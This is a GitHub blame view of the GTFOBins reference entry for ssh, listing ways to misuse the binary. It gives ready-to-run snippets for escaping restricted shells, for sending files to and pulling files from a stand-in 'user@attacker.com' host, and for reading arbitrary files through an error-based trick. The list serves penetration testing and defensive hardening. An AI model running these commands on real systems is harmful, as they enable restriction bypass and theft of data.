GTFOBins.github.io/_gtfobins/ssh.md

26 lines
733 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-05-21 21:14:41 +02:00
- description: Reconnecting may help bypassing restricted shells.
2018-05-28 17:47:54 +02:00
code: ssh localhost $SHELL --noprofile --norc
2018-05-21 21:14:41 +02:00
download:
- description: Fetch a remote file from a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
2018-05-21 21:14:41 +02:00
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
2018-05-21 21:14:41 +02:00
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
2018-05-28 09:44:53 +02:00
file-read:
- description: Read lines from text files (error-based approach).
2018-05-29 17:11:36 +02:00
code: |
2018-05-28 09:44:53 +02:00
LFILE=file_to_read
ssh -F $LFILE localhost
2018-05-21 21:14:41 +02:00
---